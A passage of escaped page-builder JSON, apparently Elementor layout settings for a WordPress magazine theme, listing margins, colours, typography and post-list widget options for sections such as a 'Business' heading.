,\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"offset\":\"\",\"category\":[\"5\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"use_shadow\":\"use\",\"use_icon_post_list_1\":\"on\",\"post_icon_color1_post_list_1\":\"#61c436\",\"post_icon_color2_post_list_1\":\"#007AFE\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"on\",\"post_view_color_post_list_1\":\"#ffffff\",\"post_list_1_view_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight\":\"600\",\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"use_category_post_list_1\":\"on\",\"typhography_category_post_list_1_color\":\"#ffffff\",\"post_list1_category_title_hov_color\":\"#ffffff\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight\":\"600\",\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"use_title_post_list_1\":\"on\",\"typhography_title_post_list_1_color\":\"#000000\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"600\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_meta_post_list_1\":\"on\",\"typhography_meta_text_post_list_1_color\":\"#999999\",\"typhography_meta_post_list_1_color\":\"#000000\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight\":\"600\",\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"on\",\"typhography_excerpt_post_list_1_color\":\"#777777\",\"post_list_1_excerpt_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"typhography_read_more_post_list_1_color\":\"#000000\",\"post_list1_read_more_title_hov_color\":\"#111111\",\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight\":\"400\",\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"typhography_read_more_border_post_list_1_color\":\"#000000\",\"post_list1_read_more_border_hov_color\":\"#111111\",\"section_magzma_post_list_1_column_control\":\"\",\"post_list1_margin_bottom\":\"20\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"content_width\":{\"unit\":\"px\",\"size\":\"\"},\"gap\":\"no\",\"height_inner\":\"default\",\"custom_height_inner\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"5qw1g6r\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"Business\",\"title_size\":\"h6\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#61c436\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"etel35k\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"offset\":\"\",\"category\":[\"9\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-4\",\"section_magzma_post_list_4_post_control\":\"\",\"width\":\"\",\"height\":\"\",\"use_shadow\":\"use\",\"use_icon_post_list_4\":\"on\",\"post_icon_color1_post_list_4\":\"#61c436\",\"post_icon_color2_post_list_4\":\"#007AFE\",\"post_icon_size_post_list_4\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_4_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_4_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_4\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_4_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_4_mobile\":{\"unit\":\"px\",\"size\":10},\"use_title_post_list_4\":\"on\",\"typhography_title_post_list_4_color\":\"#000000\",\"typhography_title_post_list_4_hov_color\":\"#aaaaaa\",\"post_list_4_title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"post_list_4_title_font_size\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_4_title_font_weight\":\"700\",\"post_list_4_title_font_weight_tablet\":\"400\",\"post_list_4_title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date_post_list_4\":\"on\",\"typhography_date_post_list_4_color\":\"#777777\",\"date_title_4_hov_color\":\"#777777\",\"post_list_4_date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_4_date_font_size\":{\"unit\":\"px\",\"size\":12},\"post_list_4_date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_4_date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list4_date_font_weight\":\"400\",\"post_list4_date_font_weight_tablet\":\"400\",\"post_list4_date_font_weight_mobile\":\"400\",\"section_magzma_post_list_4_column_control\":\"\",\"post_list4_margin_bottom\":\"\",\"horizontal_use_list_4\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size_list_style_4\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_4_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_4_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-4\"},{\"id\":\"hwrnwkw\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list_3_po